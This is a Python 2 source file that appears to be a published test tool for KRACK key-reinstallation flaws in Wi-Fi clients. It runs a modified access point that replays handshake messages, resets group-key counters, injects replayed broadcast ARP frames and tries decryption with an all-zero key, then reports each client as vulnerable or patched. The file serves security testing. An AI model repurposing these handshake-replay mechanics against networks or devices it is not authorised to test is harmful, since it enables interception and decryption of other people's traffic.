krack-test-client.py 24 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import libwifi
  11. from libwifi import *
  12. import sys, socket, struct, time, subprocess, atexit, select, os.path
  13. from wpaspy import Ctrl
  14. # TODOs:
  15. # - Always mention 4-way handshake attack test (normal, tptk, tptk-rand)
  16. # - Stop testing a client even when we think it's patched?
  17. # - The --gtkinit with the 4-way handshake is very sensitive to packet loss
  18. # Futute work:
  19. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  20. # - Automatically execute all relevant tests in order
  21. # - Force client to request a new IP address when connecting
  22. # - More reliable group key reinstall test: install very high RSC, then install a zero one
  23. # After how many seconds a new message 3, or new group key message 1, is sent.
  24. HANDSHAKE_TRANSMIT_INTERVAL = 2
  25. #### Utility Commands ####
  26. def hostapd_clear_messages(hostapd_ctrl):
  27. # Clear old replies and messages from the hostapd control interface
  28. while hostapd_ctrl.pending():
  29. hostapd_ctrl.recv()
  30. def hostapd_command(hostapd_ctrl, cmd):
  31. hostapd_clear_messages(hostapd_ctrl)
  32. rval = hostapd_ctrl.request(cmd)
  33. if "UNKNOWN COMMAND" in rval:
  34. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  35. quit(1)
  36. return rval
  37. #### Main Testing Code ####
  38. class TestOptions():
  39. ReplayBroadcast, ReplayUnicast, Fourway, Grouphs = range(4)
  40. TptkNone, TptkReplay, TptkRand = range(3)
  41. def __init__(self, variant=Fourway):
  42. self.variant = variant
  43. # Additional options for Fourway tests
  44. self.tptk = TestOptions.TptkNone
  45. # Extra option for Fourway and Grouphs tests
  46. self.gtkinit = False
  47. class ClientState():
  48. UNKNOWN, VULNERABLE, PATCHED = range(3)
  49. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  50. def __init__(self, clientmac, options):
  51. self.mac = clientmac
  52. self.options = options
  53. self.TK = None
  54. self.vuln_4way = ClientState.UNKNOWN
  55. self.vuln_bcast = ClientState.UNKNOWN
  56. self.ivs = IvCollection()
  57. self.pairkey_sent_time_prev_iv = None
  58. self.pairkey_intervals_no_iv_reuse = 0
  59. self.broadcast_reset()
  60. def broadcast_reset(self):
  61. self.broadcast_state = ClientState.IDLE
  62. self.broadcast_prev_canary_time = 0
  63. self.broadcast_num_canaries_received = -1 # -1 because the first broadcast ARP requests are still valid
  64. self.broadcast_requests_sent = -1 # -1 because the first broadcast ARP requests are still valid
  65. self.broadcast_patched_intervals = 0
  66. # TODO: Put in libwifi?
  67. def get_encryption_key(self, hostapd_ctrl):
  68. if self.TK is None:
  69. # Contact our modified Hostapd instance to request the pairwise key
  70. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  71. if not "FAIL" in response:
  72. self.TK = response.strip().decode("hex")
  73. return self.TK
  74. # TODO: Put in libwifi?
  75. def decrypt(self, p, hostapd_ctrl):
  76. payload = get_ccmp_payload(p)
  77. llcsnap, packet = payload[:8], payload[8:]
  78. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  79. # On some kernels, the virtual interface associated to the real AP interface will return
  80. # frames where the payload is already decrypted (this happens when hardware decryption is
  81. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  82. plaintext = payload
  83. else:
  84. key = self.get_encryption_key(hostapd_ctrl)
  85. plaintext = decrypt_ccmp(p, key)
  86. # If it still fails, try an all-zero key
  87. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  88. plaintext = decrypt_ccmp(p, "\x00" * 16)
  89. return plaintext
  90. def track_used_iv(self, p):
  91. return self.ivs.track_used_iv(p)
  92. def is_iv_reused(self, p):
  93. return self.ivs.is_iv_reused(p)
  94. def check_pairwise_reinstall(self, p):
  95. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  96. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  97. if self.ivs.is_iv_reused(p):
  98. if self.vuln_4way != ClientState.VULNERABLE:
  99. iv = dot11_get_iv(p)
  100. seq = dot11_get_seqnum(p)
  101. log(WARNING, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  102. "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq))
  103. self.vuln_4way = ClientState.VULNERABLE
  104. # If it's a higher IV than all previous ones, try to check if the client seems patched
  105. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  106. # Save how many intervals we received a data packet without IV reset. Use twice the
  107. # transmission interval of message 3, in case one message 3 is lost due to noise.
  108. if self.pairkey_sent_time_prev_iv is None:
  109. self.pairkey_sent_time_prev_iv = p.time
  110. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  111. self.pairkey_intervals_no_iv_reuse += 1
  112. self.pairkey_sent_time_prev_iv = p.time
  113. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  114. # If during several intervals all IV reset attempts failed, the client is likely patched.
  115. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  116. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  117. self.vuln_4way = ClientState.PATCHED
  118. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  119. msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
  120. if self.options.tptk == TestOptions.TptkNone:
  121. msg += " (used standard attack)"
  122. elif self.options.tptk == TestOptions.TptkReplay:
  123. msg += " (used TPTK attack)"
  124. elif self.options.tptk == TestOptions.TptkRand:
  125. msg += " (used TPTK-RAND attack)"
  126. log(INFO, (msg + ".") % self.mac, color="green")
  127. def mark_allzero_key(self, p):
  128. if self.vuln_4way != ClientState.VULNERABLE:
  129. iv = dot11_get_iv(p)
  130. seq = dot11_get_seqnum(p)
  131. log(WARNING, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  132. "Client (re)installs an all-zero key in the 4-way handshake (this is very bad).") % (self.mac, iv, seq))
  133. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac, color="red")
  134. self.vuln_4way = ClientState.VULNERABLE
  135. def broadcast_print_patched(self):
  136. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  137. # TODO: Mention which variant of the 4-way handshake test was used
  138. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  139. if self.options.gtkinit:
  140. log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
  141. else:
  142. log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
  143. if self.options.variant == TestOptions.ReplayBroadcast:
  144. log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")
  145. def broadcast_print_vulnerable(self):
  146. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  147. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  148. if self.options.gtkinit:
  149. log(WARNING, "%s: Client always installs the group key in the %s handshake with a zero replay counter (this is bad)." % (self.mac, hstype))
  150. else:
  151. log(WARNING, "%s: Client reinstalls the group key in the %s handshake (this is bad)." % (self.mac, hstype))
  152. log(WARNING, " Or client accepts replayed broadcast frames (see --replay-broadcast).")
  153. if self.options.variant == TestOptions.ReplayBroadcast:
  154. log(WARNING, "%s: Client accepts replayed broadcast frames (this is bad)." % self.mac)
  155. log(WARNING, " Fix this before testing for group key (re)installations!")
  156. def broadcast_process_reply(self, p):
  157. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  158. # Must be testing this client, and must not be a benign retransmission
  159. if not self.broadcast_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  160. if self.broadcast_prev_canary_time + 1 > p.time: return
  161. self.broadcast_num_canaries_received += 1
  162. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.broadcast_num_canaries_received))
  163. # We wait for several replies before marking the client as vulnerable, because
  164. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  165. if self.broadcast_num_canaries_received >= 5:
  166. assert self.vuln_bcast != ClientState.VULNERABLE
  167. self.vuln_bcast = ClientState.VULNERABLE
  168. self.broadcast_state = ClientState.FINISHED
  169. self.broadcast_print_vulnerable()
  170. # Remember that we got a reply this interval (see broadcast_check_replies to detect patched clients)
  171. else:
  172. self.broadcast_state = ClientState.GOT_CANARY
  173. self.broadcast_prev_canary_time = p.time
  174. def broadcast_check_replies(self):
  175. """Track when we send broadcast ARP requests, and determine if a client seems patched"""
  176. if self.broadcast_state == ClientState.IDLE:
  177. return
  178. if self.broadcast_requests_sent == 4:
  179. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  180. if self.broadcast_state == ClientState.GOT_CANARY:
  181. log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
  182. self.broadcast_state = ClientState.STARTED
  183. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  184. elif self.broadcast_state == ClientState.STARTED:
  185. self.broadcast_patched_intervals += 1
  186. log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
  187. self.broadcast_state = ClientState.STARTED
  188. self.broadcast_requests_sent = 0
  189. # If the client appears secure for several intervals (see above), it's likely patched
  190. if self.broadcast_patched_intervals >= 5 and self.vuln_bcast == ClientState.UNKNOWN:
  191. self.vuln_bcast = ClientState.PATCHED
  192. self.broadcast_state = ClientState.FINISHED
  193. self.broadcast_print_patched()
  194. class KRAckAttackClient():
  195. def __init__(self):
  196. # Parse hostapd.conf
  197. self.script_path = os.path.dirname(os.path.realpath(__file__))
  198. try:
  199. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  200. except Exception as ex:
  201. log(ERROR, "Failed to parse the hostapd.conf config file")
  202. raise
  203. if not interface:
  204. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  205. quit(1)
  206. # Set other variables
  207. self.nic_iface = interface
  208. self.nic_mon = interface + "mon"
  209. self.options = None
  210. try:
  211. self.apmac = scapy.arch.get_if_hwaddr(interface)
  212. except:
  213. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  214. raise
  215. self.sock_mon = None
  216. self.sock_eth = None
  217. self.hostapd = None
  218. self.hostapd_ctrl = None
  219. self.dhcp = None
  220. self.broadcast_sender_ip = None
  221. self.broadcast_arp_sock = None
  222. self.clients = dict()
  223. def reset_client_info(self, clientmac):
  224. if clientmac in self.dhcp.leases:
  225. self.dhcp.remove_client(clientmac)
  226. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  227. if clientmac in self.clients:
  228. del self.clients[clientmac]
  229. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  230. def handle_replay(self, p):
  231. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  232. function processes these frames manually so we can still test reinstallations of the group key."""
  233. if not Dot11WEP in p: return
  234. # Reconstruct Ethernet header
  235. clientmac = p.addr2
  236. header = Ether(dst=self.apmac, src=clientmac)
  237. header.time = p.time
  238. # Decrypt the payload and obtain LLC/SNAP header and packet content
  239. client = self.clients[clientmac]
  240. plaintext = client.decrypt(p, self.hostapd_ctrl)
  241. llcsnap, packet = plaintext[:8], plaintext[8:]
  242. # Rebuild the full Ethernet packet
  243. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  244. decap = header/ARP(packet)
  245. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  246. decap = header/IP(packet)
  247. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  248. decap = header/IPv6(packet)
  249. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  250. # # EAPOL
  251. else:
  252. return
  253. # Now process the packet as if it were a valid (non-replayed) one
  254. self.process_eth_rx(decap)
  255. def handle_mon_rx(self):
  256. p = self.sock_mon.recv()
  257. if p == None: return
  258. if p.type == 1: return
  259. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  260. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  261. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  262. # The first bit in FCfield is set if the frames is "to-DS"
  263. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  264. if apmac != self.apmac: return None
  265. # Reset info about disconnected clients
  266. if Dot11Deauth in p or Dot11Disas in p:
  267. self.reset_client_info(clientmac)
  268. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  269. elif p.addr1 == self.apmac and Dot11WEP in p:
  270. if not clientmac in self.clients:
  271. self.clients[clientmac] = ClientState(clientmac, options=options)
  272. client = self.clients[clientmac]
  273. iv = dot11_get_iv(p)
  274. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  275. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  276. client.mark_allzero_key(p)
  277. if self.options.variant == TestOptions.Fourway and not self.options.gtkinit:
  278. client.check_pairwise_reinstall(p)
  279. if client.is_iv_reused(p):
  280. self.handle_replay(p)
  281. client.track_used_iv(p)
  282. def process_eth_rx(self, p):
  283. self.dhcp.reply(p)
  284. self.broadcast_arp_sock.reply(p)
  285. clientmac = p[Ether].src
  286. if not clientmac in self.clients: return
  287. client = self.clients[clientmac]
  288. if ARP in p and p[ARP].pdst == self.broadcast_sender_ip:
  289. client.broadcast_process_reply(p)
  290. def handle_eth_rx(self):
  291. p = self.sock_eth.recv()
  292. if p == None or not Ether in p: return
  293. self.process_eth_rx(p)
  294. def broadcast_send_request(self, client):
  295. clientip = self.dhcp.leases[client.mac]
  296. # Print a message when we start testing the client --- XXX this should be in the client?
  297. if client.broadcast_state == ClientState.IDLE:
  298. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  299. log(STATUS, "%s: client has IP address -> now sending replayed broadcast ARP packets" % client.mac)
  300. client.broadcast_state = ClientState.STARTED
  301. # Send a new handshake message when testing the group key handshake
  302. if self.options.variant == TestOptions.Grouphs:
  303. cmd = "RESEND_GROUP_M1 " + client.mac
  304. cmd += "maxrsc" if self.options.gtkinit else ""
  305. hostapd_command(self.hostapd_ctrl, cmd)
  306. # Send a replayed broadcast ARP request to the client
  307. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
  308. self.sock_eth.send(request)
  309. client.broadcast_requests_sent += 1
  310. log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
  311. clientip, self.broadcast_sender_ip, client.broadcast_requests_sent))
  312. def configure_interfaces(self):
  313. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  314. # 0. Some users may forget this otherwise
  315. subprocess.check_output(["rfkill", "unblock", "wifi"])
  316. # 1. Remove unused virtual interfaces to start from a clean state
  317. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  318. # 2. Configure monitor mode on interfaces
  319. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  320. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  321. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  322. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  323. time.sleep(0.5)
  324. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  325. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  326. def run(self, options):
  327. self.options = options
  328. self.configure_interfaces()
  329. # Open the patched hostapd instance that carries out tests and let it start
  330. log(STATUS, "Starting hostapd ...")
  331. try:
  332. self.hostapd = subprocess.Popen([
  333. os.path.join(self.script_path, "../hostapd/hostapd"),
  334. os.path.join(self.script_path, "hostapd.conf")]
  335. + sys.argv[1:])
  336. except:
  337. if not os.path.exists("../hostapd/hostapd"):
  338. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  339. raise
  340. time.sleep(1)
  341. try:
  342. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  343. self.hostapd_ctrl.attach()
  344. except:
  345. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  346. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  347. raise
  348. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  349. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  350. # Let scapy handle DHCP requests
  351. self.dhcp = DHCP_sock(sock=self.sock_eth,
  352. domain='krackattack.com',
  353. pool=Net('192.168.100.0/24'),
  354. network='192.168.100.0/24',
  355. gw='192.168.100.254',
  356. renewal_time=600, lease_time=3600)
  357. # Configure gateway IP: reply to ARP and ping requests
  358. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  359. # Use a dedicated IP address for our broadcast ARP requests and replies
  360. self.broadcast_sender_ip = self.dhcp.pool.pop()
  361. self.broadcast_arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.broadcast_sender_ip, ARP_addr=self.apmac)
  362. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  363. # Monitor both the normal interface and virtual monitor interface of the AP
  364. self.next_arp = time.time() + 1
  365. while True:
  366. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  367. if self.sock_mon in sel[0]: self.handle_mon_rx()
  368. if self.sock_eth in sel[0]: self.handle_eth_rx()
  369. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  370. if time.time() > self.next_arp:
  371. # When testing if the replay counter of the group key is properly installed, always install
  372. # a new group key. Otherwise KRACK patches might interfere with this test.
  373. # Otherwise just reset the replay counter of the current group key.
  374. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs] and self.options.gtkinit:
  375. hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
  376. else:
  377. hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
  378. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  379. for client in self.clients.values():
  380. # 1. Test the 4-way handshake
  381. if self.options.variant == TestOptions.Fourway and self.options.gtkinit and client.vuln_bcast != ClientState.VULNERABLE:
  382. # Execute a new handshake to test stations that don't accept a retransmitted message 3
  383. hostapd_command(self.hostapd_ctrl, "RENEW_PTK " + client.mac)
  384. # TODO: wait untill 4-way handshake completed? And detect failures (it's sensitive to frame losses)?
  385. elif self.options.variant == TestOptions.Fourway and not self.options.gtkinit and client.vuln_4way != ClientState.VULNERABLE:
  386. # First inject a message 1 if requested using the TPTK option
  387. if self.options.tptk == TestOptions.TptkReplay:
  388. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
  389. elif self.options.tptk == TestOptions.TptkRand:
  390. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
  391. # Note that we rely on an encrypted message 4 as reply to detect pairwise key reinstallations reinstallations.
  392. hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + ("maxrsc" if self.options.gtkinit else ""))
  393. # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
  394. # to PATCHED clients (just to be sure they keep rejecting replayed frames).
  395. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs, TestOptions.ReplayBroadcast]:
  396. # 2a. Check if we got replies to previous requests (and determine if vulnerable)
  397. client.broadcast_check_replies()
  398. # 2b. Send new broadcast ARP requests (and handshake messages if needed)
  399. if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  400. self.broadcast_send_request(client)
  401. def stop(self):
  402. log(STATUS, "Closing hostapd and cleaning up ...")
  403. if self.hostapd:
  404. self.hostapd.terminate()
  405. self.hostapd.wait()
  406. if self.sock_mon: self.sock_mon.close()
  407. if self.sock_eth: self.sock_eth.close()
  408. def cleanup():
  409. attack.stop()
  410. def argv_get_interface():
  411. for i in range(len(sys.argv)):
  412. if not sys.argv[i].startswith("-i"):
  413. continue
  414. if len(sys.argv[i]) > 2:
  415. return sys.argv[i][2:]
  416. else:
  417. return sys.argv[i + 1]
  418. return None
  419. def argv_pop_argument(argument):
  420. if not argument in sys.argv: return False
  421. idx = sys.argv.index(argument)
  422. del sys.argv[idx]
  423. return True
  424. def hostapd_read_config(config):
  425. # Read the config, get the interface name, and verify some settings.
  426. interface = None
  427. with open(config) as fp:
  428. for line in fp.readlines():
  429. line = line.strip()
  430. if line.startswith("interface="):
  431. interface = line.split('=')[1]
  432. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  433. if "TKIP" in line:
  434. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  435. log(ERROR, " >%s<" % line, showtime=False)
  436. quit(1)
  437. # Parameter -i overrides interface in config.
  438. # FIXME: Display warning when multiple interfaces are used.
  439. if argv_get_interface() is not None:
  440. interface = argv_get_interface()
  441. return interface
  442. if __name__ == "__main__":
  443. if "--help" in sys.argv or "-h" in sys.argv:
  444. print "\nSee README.md for usage instructions. Accepted parameters are"
  445. print "\n\t" + "\n\t".join(["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]) + "\n"
  446. quit(1)
  447. options = TestOptions()
  448. # Parse the type of test variant to execute
  449. replay_broadcast = argv_pop_argument("--replay-broadcast")
  450. replay_unicast = argv_pop_argument("--replay-unicast")
  451. groupkey = argv_pop_argument("--group")
  452. fourway = argv_pop_argument("--fourway")
  453. if replay_broadcast + replay_unicast + fourway + groupkey > 1:
  454. print "You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group"
  455. quit(1)
  456. if replay_broadcast:
  457. options.variant = TestOptions.ReplayBroadcast
  458. elif replay_unicast:
  459. options.variant = TestOptions.ReplayUnicast
  460. elif groupkey:
  461. options.variant = TestOptions.Grouphs
  462. else:
  463. options.variant = TestOptions.Fourway
  464. # Parse options for the 4-way handshake
  465. tptk = argv_pop_argument("--tptk")
  466. tptk_rand = argv_pop_argument("--tptk-rand")
  467. if tptk + tptk_rand > 1:
  468. print "You can only select one argument of out tptk and tptk-rand"
  469. quit(1)
  470. if tptk:
  471. options.tptk = TestOptions.TptkReplay
  472. elif tptk_rand:
  473. options.tptk = TestOptions.TptkRand
  474. else:
  475. options.tptk = TestOptions.TptkNone
  476. # Parse remaining options
  477. options.gtkinit = argv_pop_argument("--gtkinit")
  478. while argv_pop_argument("--debug"):
  479. libwifi.global_log_level -= 1
  480. # Now start the tests
  481. attack = KRAckAttackClient()
  482. atexit.register(cleanup)
  483. attack.run(options=options)